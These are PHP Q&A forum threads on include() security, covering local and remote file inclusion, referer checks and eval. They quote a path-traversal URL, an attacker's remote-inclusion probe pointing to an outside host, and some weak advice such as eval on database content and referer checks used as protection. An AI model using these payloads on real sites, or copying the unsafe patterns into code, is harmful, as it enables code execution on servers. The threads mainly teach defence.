/* define page path */
define("PAGE_DIR", "pages/");
if (file_exists(PAGE_DIR."$_GET[page].php")) include(PAGE_DIR."$_GET[page].php");
How safe is this? Could you for example include a page on another webserver if the page is in a folder called pages?
Thanks
This isn't safe at all - Think about what happens if $_GET[page] contains ../../../somewhere/else/
You should explicitly have a list of allowed pages.
Edit: I don't think it could include a file from a different server, but it's still not a good thing to be doing.
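A minimal sketch of that allowed-pages idea, reusing the code from the question (the page names in $allowed are only placeholders):

<?php
define("PAGE_DIR", "pages/");

// Only page names listed here can ever be included.
$allowed = array("home", "about", "contact");

$page = isset($_GET['page']) ? $_GET['page'] : "home";

if (in_array($page, $allowed, true)) {
    include PAGE_DIR . $page . ".php";
} else {
    // Unknown page: fall back to a default instead of using the request value.
    include PAGE_DIR . "home.php";
}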
It's never good practice to pass unsanitized user input directly to a command, especially something like include(). You don't necessarily know how the underlying webserver/OS is going to handle, for example, relative paths, extended characters, etc. Any of these, used maliciously or otherwise, could result in the user seeing something they're not supposed to see.
One possible exploit: user passes in the relative path to a malicious script in a known location on the server. http://webserver/yourscript.php?page=%2e%2e%2f%2e%2e%2f%2e%2e%2fhome/bad_user/evil_script
which your function could translate to pages/../../../home/bad_user/evil_script.php, which include will happily include, sometimes. So your web page when served could very well execute bad_user's php script, which he could use to do all kinds of nasty stuff.
At the very least you should assign $_GET['path'] to a new variable and addslashes().
Doing anything with $_GET or $_POST prior to validating/sanitizing the data is dangerous. Assume that all users are out to get you, and sanitize the data prior to using it.
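For example, a rough way to reject anything that isn't a plain page name before it ever reaches include() (the pattern and the "index" fallback are just illustrations):

<?php
$page = isset($_GET['page']) ? $_GET['page'] : 'index';

// Accept only letters, digits, underscores and dashes: no slashes, dots or null bytes.
if (!preg_match('/^[A-Za-z0-9_-]+$/', $page)) {
    $page = 'index';
}

include 'pages/' . $page . '.php';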
I have an ajax.php file to which all of my ajax calls point with an extra parameter of the script the current call demands to execute. My problem is that I want to limit some scripts to being executed by specific pages only, say for example sendComment.php should only be called from www.mysite.com/user/{any user}.
What I have done is put this code on top of every script that I want to limit:
if (strstr($_SERVER['HTTP_REFERER'], 'mysite.com/{page_allowed_to_exec_script}')) {
    // Then do stuff here
}
But what I've come to notice is that not all browsers send the HTTP_REFERER header (I might have spelled that incorrectly, I'm writing this from memory). Besides not being reliable across browsers, it's also a pain having to hardcode this check in all of the files, and it will be an even bigger pain when something needs to change. I'm looking for a way to have all the scripts in an array along with the pages that are allowed to execute them, and perform a single check in ajax.php at the start.
Does anyone have any idea how this can be achieved?
Even browsers that would normally send the "referer" header may not: a proxy, firewall or "security" suite can strip it out or even change it. So you can't trust it.
If you control the referring page you can use sessions, cookies or the URL to pass the information if you feel it's that vital. If it's absolutely vital, your only option is sessions. The other two can easily be removed.
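One possible sketch that combines the two ideas: a central map in ajax.php plus a page name that each page stores in the session when it renders (the script names, session key and paths are placeholders):

<?php
// ajax.php
session_start();

// Central map: each AJAX script and the pages allowed to call it.
$permissions = array(
    'sendComment'  => array('user'),
    'deleteAvatar' => array('user', 'admin'),
);

$script = isset($_GET['script']) ? $_GET['script'] : '';
// Each page stores its own name when it is rendered, e.g. $_SESSION['current_page'] = 'user';
$page = isset($_SESSION['current_page']) ? $_SESSION['current_page'] : '';

if (isset($permissions[$script]) && in_array($page, $permissions[$script], true)) {
    // $script is guaranteed to be one of the array keys above, so this include is safe.
    include 'scripts/' . $script . '.php';
} else {
    header('HTTP/1.0 403 Forbidden');
    exit;
}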
I want to require/include content from a database record, but require/include only accepts files. This is related to caching, so I don't want to write anything to a file (collisions etc.). How can I work around that?
Are you fetching PHP code from a database? If so, you're probably doing it wrong. Ideally you should only store data inside a database, not code.
If you're fetching a PHP structure from the database, consider using a serialize()'d version of it (or json_encode()'d).
Maybe I have missed the exact purpose of what you're trying to accomplish, do let me know if I'm on the wrong path with my answer.
Whatever you do, don't rely on eval unless you really really have to; and even then, don't :)
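A tiny sketch of the serialize()/json_encode() idea, assuming a hypothetical cache column holds the encoded string:

<?php
// Writing: store data, not code.
$settings = array('theme' => 'dark', 'per_page' => 20);
$payload  = json_encode($settings);        // or serialize($settings)
// ... INSERT $payload into the cache table here ...

// Reading: turn it back into a structure instead of eval()'ing anything.
$settings = json_decode($payload, true);   // or unserialize($payload)
echo $settings['theme'];                   // prints "dark"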
Since others have covered eval() and the fact that this is a bad idea, I will touch on the topic of writing this "content" to a file. Use tempnam. This will give you the name of a just-created unique filename with 0600 permissions. You can then open it, write your content, close, then require/include. See Example #1 on the tempnam man page.
Make sure to check that the return value of tempnam is not false; make sure to unlink the file after you are done.
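A rough sketch of that approach, loosely following the tempnam() example in the manual (it assumes $code already holds the snippet fetched from the database, complete with its opening <?php tag):

<?php
// $code holds the PHP source fetched from the database (assumed trusted).
$tmpfile = tempnam(sys_get_temp_dir(), 'cache_');

if ($tmpfile === false) {
    die('Could not create a temporary file');
}

file_put_contents($tmpfile, $code);
include $tmpfile;   // run the cached code
unlink($tmpfile);   // always clean up afterwards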
If it is code, you need to use eval(), though there are many anti-patterns that involve eval()
The manual says:
Caution: The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it without properly validating it beforehand.
This is very dangerous, especially if the database content was contributed by a user, but anyway you could use this:
eval($your_database_content);
Manual
On my website, I have a search.php page that makes $.get requests to pages like search_data.php and search_user_data.php etc.
The problem is all of these files are located within my public html folder.
Someone could browse directly to www.mysite.com/search_user_data.php. All of the data it processes is properly escaped and handled, but on a professional level it still seems inadequate to have this file within public reach.
I have tried moving the sensitive files outside my public web root, but since jQuery is making $.get requests and passing variables in the URL, this doesn't work.
Does anyone know any methods to firmly secure these vulnerable pages?
What you describe is normal.
You have PHP files that are reachable in your www directory so apache (or your favored webserver) can read and process them.
If you move them out you can't reach them anymore so there is no real option of that sort.
After all, your PHP files for AJAX are just regular PHP files; the rest of your project likely contains PHP files too, right? They are no more or less at risk than any other script on your server.
Make sure you program "clean". Think about evil requests when writing your php functions, not after writing them.
As you already did: correctly quote all incoming input that might hit a database or sensitive function.
You can add security checks on your incoming values and create an automated email if you detect someone trying evil stuff. So you'll likely receive a warning in such cases.
But on the downside: You'll regularly receive warnings because some companies automatically scan websites for possible bugs. So you will receive a warning on such scans as well.
On top of writing your code as "secure" as you can, you may want to add a referer check in your code. That means your PHP file will only react if your website was given as referer when accessing it. That's enough to block 80% of the kids out there.
But on the downside: a few internet users do not send a referer at all, some proxies filter that. (I personally would ignore them, half the (www) internet breaks on them anyway)
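A minimal version of such a referer check might look like this (the site URL is a placeholder, and as noted above the header can be missing or forged):

<?php
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';

// Only respond when the request claims to come from our own site.
if (strpos($referer, 'http://www.mysite.com/') !== 0) {
    header('HTTP/1.0 403 Forbidden');
    exit;
}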
One more layer of protection can be added by htaccess, you can do most within PHP but it might still be of interest for you: http://httpd.apache.org/docs/2.0/howto/htaccess.html
You can generate a uid each time your page is loaded and store it in $_SESSION['uid']. You give this uid to JavaScript by doing:
var uid = <?php print $_SESSION['uid']; ?>;
Then you pass it with your GET request and compare it to your $_SESSION:
if($_GET['uid'] != $_SESSION['uid']) // Stop with an error message or send a forbidden header.
If it's ok, do what you need.
It's not perfect since someone can request search.php and get the current uid, and then request the other pages, but it may be the best possible solution.
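Putting the pieces together, a rough sketch of that flow (the token generation and file names are only illustrations):

<?php
// search.php – generate a per-session token and hand it to JavaScript.
session_start();
if (empty($_SESSION['uid'])) {
    $_SESSION['uid'] = md5(uniqid(mt_rand(), true));
}
?>
<script>
var uid = "<?php echo $_SESSION['uid']; ?>";
// $.get('search_data.php', { uid: uid, q: query }, handleResult);
</script>

<?php
// search_data.php – reject requests that don't carry the session token.
session_start();
if (empty($_SESSION['uid']) || empty($_GET['uid']) || $_GET['uid'] !== $_SESSION['uid']) {
    header('HTTP/1.0 403 Forbidden');
    exit;
}
// ...perform the search and echo the result...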
I've been told that it is insecure to make database connections inside a PHP include. For example, if I have a login page and add an include('process.php') at the top of the page that makes a database connection, is that insecure?
For example, if I have a login page and add an include('process.php') at the top of the page that makes a database connection, is that insecure?
No.
Maybe the person who told you this was talking about something else - like including a file using a dynamic value coming from a GET parameter, or using remote http:// includes, or, as @AlienWebguy mentions, having the password include inside the web root. But using includes in itself is not insecure.
It's only insecure if you are storing your passwords literally in your PHP files. They should be declared outside of the web root. That being said, the lack of security is not due to the use of the include() function.
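A common layout for that, with hypothetical paths and credentials:

<?php
// /home/account/config/db_config.php – stored ABOVE the public web root,
// so the webserver can never serve it directly.
$db_host = 'localhost';
$db_user = 'app_user';
$db_pass = 'secret';

<?php
// /home/account/public_html/process.php
require __DIR__ . '/../config/db_config.php';
$link = mysqli_connect($db_host, $db_user, $db_pass, 'mydatabase');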
In and of itself, no, it is not insecure. How it's implemented inside the include is of course a different story.
That's the way I've always done it. I make sure that the include is in a different directory that has open permissions and that the directory you're writing in has locked permissions. Hopefully that makes sense.
This question is way too broad to get a good answer from anyone. Short answer is no, there's nothing inherently insecure about including a file that connects to a database. However, if you write code that isn't written properly, then yes it may be insecure to do this.
Since using include('process.php') is exactly the same as pasting the contents of process.php into the code of the other file, that should not be, per se, a security issue. The insecurity could be in your code, not in the fact that you use the include. In fact, it could even improve the safety of your code, thanks to the reuse.
A guy called ShiroHige is trying to hack my website.
He tries to open a page with this parameter:
mysite/dir/nalog.php?path=http://smash2.fileave.com/zfxid1.txt???
If you look at that text file, it is just an echo followed by a die():
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>
So what exploit is he trying to use (WordPress?)?
Edit 1:
I know he is trying to use RFI.
Is there some popular script that is exploitable that way (Drupal, phpBB, etc.)?
An obvious one: just an unsanitized include.
He is checking if the code gets executed.
If he finds his signature in a response, he will know that your site is ready to run whatever code he sends.
To prevent such attacks one has to strictly sanitize filenames, if they happen to be sent via HTTP requests.
A quick and cheap validation can be done using basename() function:
// $modules_dir is the directory that holds your page scripts.
if (empty($_GET['page'])) {
    $_GET['page'] = "index";
}
$page = $modules_dir . basename($_GET['page']) . ".php";
if (!is_readable($page)) {
    header("HTTP/1.0 404 Not Found");
    $page = "404.html";
}
include $page;
or using some regular expression.
There is also an extremely useful PHP configuration directive called allow_url_include, which is set to off by default in modern PHP versions, so it protects you from such attacks automatically.
The vulnerability the attacker is aiming for is probably some kind of remote file inclusion, exploiting PHP’s include and similar functions/constructs that allow loading a (remote) file and executing its contents:
Security warning
Remote file may be processed at the remote server (depending on the file extension and the fact if the remote server runs PHP or not) but it still has to produce a valid PHP script because it will be processed at the local server. If the file from the remote server should be processed there and outputted only, readfile() is much better function to use. Otherwise, special care should be taken to secure the remote script to produce a valid and desired code.
Note that using readfile() only avoids the loaded file being executed; it is still possible to exploit it to load other content that is then printed directly to the user. This can be used to print the plain contents of files of any type in the local file system (i.e. Path Traversal) or to inject code into the page (i.e. Code Injection). So the only protection is to validate the parameter value before using it.
See also OWASP’s Development Guide on “File System – Includes and Remote files” for further information.
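Beyond a simple basename() whitelist, one way to validate the final path is to resolve it with realpath() and check that it still lies inside the intended directory (the directory and parameter names here are only examples):

<?php
$base = realpath('/var/www/site/pages');
$path = realpath($base . '/' . $_GET['path']);

// Reject anything that does not exist or resolved outside the pages directory.
if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
    header('HTTP/1.0 404 Not Found');
    exit;
}

include $path;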
It looks like the attack is designed to print out "ShiroHige" on vulnerable sites.
The idea being that if you use include but do not sanitize your input, then the PHP in this text file is executed. If this works, then he can send any PHP code to your site and execute it.
A list of similar files can be found here. http://tools.sucuri.net/?page=tools&title=blacklist&detail=072904895d17e2c6c55c4783df7cb4db
He's trying to get your site to run his file. This would probably be an XSS attack? Not quite familiar with the terms (Edit: RFI - Remote file inclusion).
Odds are he doesn't know what he's doing. If there’s a way to get into WordPress, it would be very public by now.
I think it's only a first test of whether your site is vulnerable to external includes. If the echo is printed, he knows it's possible to inject code.
You're not giving much detail on the situation and leaving a lot to the imagination.
My guess is that he's trying to exploit allow_url_fopen. And right now he's just testing code to see what he can do. This is the first wave!
I think it is just a malicious URL. As soon as I entered it into my browser, Avast antivirus flagged it as malicious. So that PHP code may be deceiving, or he may just be testing. Another possibility is that the hacker has no bad intentions and just wants to show that he could get past your security.